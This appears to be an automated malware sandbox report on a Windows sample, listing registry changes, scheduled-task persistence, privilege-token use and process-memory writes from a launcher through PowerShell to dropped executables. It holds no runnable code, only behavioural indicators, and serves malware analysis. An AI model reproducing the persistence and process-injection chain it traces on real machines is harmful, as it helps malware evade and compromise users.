Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\338f0b8d-8721-4902-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b9370182-145c-438a-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b9370182-145c-438a-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31ccd8be-047f-4378- = 95aa3a01ecc4da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31ccd8be-047f-4378- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31ccd8be-047f-4378- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000814b3601ecc4da01814b3601ecc4da01814b3601ecc4da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d65858ac2000336362366130316133643836393132363939376135396165633363373732306537326230336637373864613161643633333739376539383666303963616239640000b20009000400efbed65858acd65858ac2e000000000000000000000000000000000000000000000000007f407200330063006200360061003000310061003300640038003600390031003200360039003900370061003500390061006500630033006300370037003200300065003700320062003000330066003700370038006400610031006100640036003300330037003900370065003900380036006600300039006300610062003900640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000053e354fd1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33636236613031613364383639313236393937613539616563336337373230653732623033663737386461316164363333373937653938366630396361623964000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000707868737470707500000000000000008c698802a9c8e9459fad3ae1381d13b7616f2e4e4628ef1190facacdd8b22a4f8c698802a9c8e9459fad3ae1381d13b7616f2e4e4628ef1190facacdd8b22a4fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600360035003000330033003600390034002d0031003400340037003800340035003300300032002d003600380030003700350030003900380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002b58b480000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d6febe5-fac8-4d8e-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b9370182-145c-438a- = c75dfc01ecc4da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\338f0b8d-8721-4902- = 3a340a02ecc4da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\338f0b8d-8721-4902- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000025be8b01ecc4da011f67ed01ecc4da011f67ed01ecc4da016a220a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d65858ac2000336362366130316133643836393132363939376135396165633363373732306537326230336637373864613161643633333739376539383666303963616239640000b20009000400efbed65858acd65858ac2e000000000000000000000000000000000000000000000000007f407200330063006200360061003000310061003300640038003600390031003200360039003900370061003500390061006500630033006300370037003200300065003700320062003000330066003700370038006400610031006100640036003300330037003900370065003900380036006600300039006300610062003900640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000053e354fd1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33636236613031613364383639313236393937613539616563336337373230653732623033663737386461316164363333373937653938366630396361623964000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000707868737470707500000000000000008c698802a9c8e9459fad3ae1381d13b7686f2e4e4628ef1190facacdd8b22a4f8c698802a9c8e9459fad3ae1381d13b7686f2e4e4628ef1190facacdd8b22a4fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600360035003000330033003600390034002d0031003400340037003800340035003300300032002d003600380030003700350030003900380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002b58b480000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\E2DE.tmp\\"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b9370182-145c-438a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\338f0b8d-8721-4902- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\DocumentationShortcuts	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductIcon = "C:\\Windows\\Installer\\{637236E9-EF59-4F9D-8269-3083C1A6C6D6}\\NodeIcon"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\9E63273695FED9F4289603381C6A6C6D	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Clients = 3a0000000000	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0a34282f-6cae-4cd1- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\NodeRuntime	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\AdvertiseFlags = "388"	msiexec.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0a34282f-6cae-4cd1-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\33663286-2b79-4856-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0a34282f-6cae-4cd1- = c79c4901ecc4da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\PackageCode = "AC6AA920FB9737143A7998E5BED98A71"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Net	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Version = "336330754"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b9370182-145c-438a- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9E63273695FED9F4289603381C6A6C6D\EnvironmentPathNpmModules = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\ProductName = "Node.js"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31ccd8be-047f-4378- = "\\\\?\\Volume{80B4582B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3cb6a01a3d869126997a59aec3c7720e72b03f778da1ad633797e986f09cab9d"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b9370182-145c-438a- = "\\\\?\\Volume{80B4582B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\bee75d1761020f883ce2536ba044a7d7d9f30a718322a5ce2a425589f8565a70"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b9370182-145c-438a- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e0a27301ecc4da011d54e301ecc4da011d54e301ecc4da01ac5809000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000d65858ac2000626565373564313736313032306638383363653235333662613034346137643764396633306137313833323261356365326134323535383966383536356137300000b20009000400efbed65858acd65858ac2e000000000000000000000000000000000000000000000000000e846400620065006500370035006400310037003600310030003200300066003800380033006300650032003500330036006200610030003400340061003700640037006400390066003300300061003700310038003300320032006100350063006500320061003400320035003500380039006600380035003600350061003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000053e354fd1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62656537356431373631303230663838336365323533366261303434613764376439663330613731383332326135636532613432353538396638353635613730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000707868737470707500000000000000008c698802a9c8e9459fad3ae1381d13b7676f2e4e4628ef1190facacdd8b22a4f8c698802a9c8e9459fad3ae1381d13b7676f2e4e4628ef1190facacdd8b22a4fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0033003600360035003000330033003600390034002d0031003400340037003800340035003300300032002d003600380030003700350030003900380033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002b58b480000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\SourceList\Media	msiexec.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\88e305b1-4343-4152-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31ccd8be-047f-4378- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0a34282f-6cae-4cd1- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9E63273695FED9F4289603381C6A6C6D\DeploymentFlags = "3"	msiexec.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

3564 schtasks.exe
4040 schtasks.exe

pid	process
3564	schtasks.exe
4040	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exeefckgwgt.pjh1.exeopenwith.exeefckgwgt.pjh2.exepowershell.exedialer.exe

pid	process
1672	powershell.exe
1672	powershell.exe
3572	powershell.exe
3572	powershell.exe
3572	powershell.exe
4444	efckgwgt.pjh1.exe
4444	efckgwgt.pjh1.exe
4200	openwith.exe
4200	openwith.exe
4200	openwith.exe
4200	openwith.exe
1628	efckgwgt.pjh2.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
1628	efckgwgt.pjh2.exe
628	dialer.exe
628	dialer.exe
1628	efckgwgt.pjh2.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe
628	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exeefckgwgt.pjh2.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exemsiexec.exemsiexec.exesvchost.exetasklist.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	1628	efckgwgt.pjh2.exe
Token: SeDebugPrivilege	628	dialer.exe
Token: SeShutdownPrivilege	3896	powercfg.exe
Token: SeCreatePagefilePrivilege	3896	powercfg.exe
Token: SeShutdownPrivilege	2252	powercfg.exe
Token: SeCreatePagefilePrivilege	2252	powercfg.exe
Token: SeShutdownPrivilege	3724	powercfg.exe
Token: SeCreatePagefilePrivilege	3724	powercfg.exe
Token: SeShutdownPrivilege	1240	powercfg.exe
Token: SeCreatePagefilePrivilege	1240	powercfg.exe
Token: SeAuditPrivilege	2284	svchost.exe
Token: SeShutdownPrivilege	2456	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2456	msiexec.exe
Token: SeSecurityPrivilege	4156	msiexec.exe
Token: SeCreateTokenPrivilege	2456	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2456	msiexec.exe
Token: SeLockMemoryPrivilege	2456	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2456	msiexec.exe
Token: SeMachineAccountPrivilege	2456	msiexec.exe
Token: SeTcbPrivilege	2456	msiexec.exe
Token: SeSecurityPrivilege	2456	msiexec.exe
Token: SeTakeOwnershipPrivilege	2456	msiexec.exe
Token: SeLoadDriverPrivilege	2456	msiexec.exe
Token: SeSystemProfilePrivilege	2456	msiexec.exe
Token: SeSystemtimePrivilege	2456	msiexec.exe
Token: SeProfSingleProcessPrivilege	2456	msiexec.exe
Token: SeIncBasePriorityPrivilege	2456	msiexec.exe
Token: SeCreatePagefilePrivilege	2456	msiexec.exe
Token: SeCreatePermanentPrivilege	2456	msiexec.exe
Token: SeBackupPrivilege	2456	msiexec.exe
Token: SeRestorePrivilege	2456	msiexec.exe
Token: SeShutdownPrivilege	2456	msiexec.exe
Token: SeDebugPrivilege	2456	msiexec.exe
Token: SeAuditPrivilege	2456	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2456	msiexec.exe
Token: SeChangeNotifyPrivilege	2456	msiexec.exe
Token: SeRemoteShutdownPrivilege	2456	msiexec.exe
Token: SeUndockPrivilege	2456	msiexec.exe
Token: SeSyncAgentPrivilege	2456	msiexec.exe
Token: SeEnableDelegationPrivilege	2456	msiexec.exe
Token: SeManageVolumePrivilege	2456	msiexec.exe
Token: SeImpersonatePrivilege	2456	msiexec.exe
Token: SeCreateGlobalPrivilege	2456	msiexec.exe
Token: SeAuditPrivilege	2284	svchost.exe
Token: SeRestorePrivilege	4156	msiexec.exe
Token: SeTakeOwnershipPrivilege	4156	msiexec.exe
Token: SeAuditPrivilege	2824	svchost.exe
Token: SeRestorePrivilege	4156	msiexec.exe
Token: SeTakeOwnershipPrivilege	4156	msiexec.exe
Token: SeRestorePrivilege	4156	msiexec.exe
Token: SeTakeOwnershipPrivilege	4156	msiexec.exe
Token: SeRestorePrivilege	4156	msiexec.exe
Token: SeTakeOwnershipPrivilege	4156	msiexec.exe
Token: SeRestorePrivilege	4156	msiexec.exe
Token: SeTakeOwnershipPrivilege	4156	msiexec.exe
Token: SeRestorePrivilege	4156	msiexec.exe
Token: SeTakeOwnershipPrivilege	4156	msiexec.exe
Token: SeDebugPrivilege	5488	tasklist.exe
Token: SeAssignPrimaryTokenPrivilege	1644	svchost.exe
Token: SeIncreaseQuotaPrivilege	1644	svchost.exe
Token: SeSecurityPrivilege	1644	svchost.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

Explorer.EXE

pid process

3416 Explorer.EXE
3416 Explorer.EXE
3416 Explorer.EXE
3416 Explorer.EXE
3416 Explorer.EXE
3416 Explorer.EXE
3416 Explorer.EXE
3416 Explorer.EXE
3416 Explorer.EXE
3416 Explorer.EXE
Suspicious use of UnmapMainImage 4 IoCs

Processes:

svchost.exeExplorer.EXE

pid process

2804 svchost.exe
2804 svchost.exe
3416 Explorer.EXE
2804 svchost.exe

pid	process
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE

pid	process
2804	svchost.exe
2804	svchost.exe
3416	Explorer.EXE
2804	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exepowershell.exeefckgwgt.pjh0.exeefckgwgt.pjh3.execmd.execmd.execmd.execmd.exeefckgwgt.pjh1.execmd.exeefckgwgt.pjh2.exedialer.exe

description	pid	process	target process
PID 4472 wrote to memory of 1672	4472	Launcher.exe	powershell.exe
PID 4472 wrote to memory of 1672	4472	Launcher.exe	powershell.exe
PID 1672 wrote to memory of 1796	1672	powershell.exe	efckgwgt.pjh0.exe
PID 1672 wrote to memory of 1796	1672	powershell.exe	efckgwgt.pjh0.exe
PID 1672 wrote to memory of 1796	1672	powershell.exe	efckgwgt.pjh0.exe
PID 1672 wrote to memory of 4444	1672	powershell.exe	efckgwgt.pjh1.exe
PID 1672 wrote to memory of 4444	1672	powershell.exe	efckgwgt.pjh1.exe
PID 1672 wrote to memory of 4444	1672	powershell.exe	efckgwgt.pjh1.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	efckgwgt.pjh2.exe
PID 1672 wrote to memory of 1628	1672	powershell.exe	efckgwgt.pjh2.exe
PID 1672 wrote to memory of 4124	1672	powershell.exe	efckgwgt.pjh3.exe
PID 1672 wrote to memory of 4124	1672	powershell.exe	efckgwgt.pjh3.exe
PID 1672 wrote to memory of 4124	1672	powershell.exe	efckgwgt.pjh3.exe
PID 1796 wrote to memory of 3196	1796	efckgwgt.pjh0.exe	cmd.exe
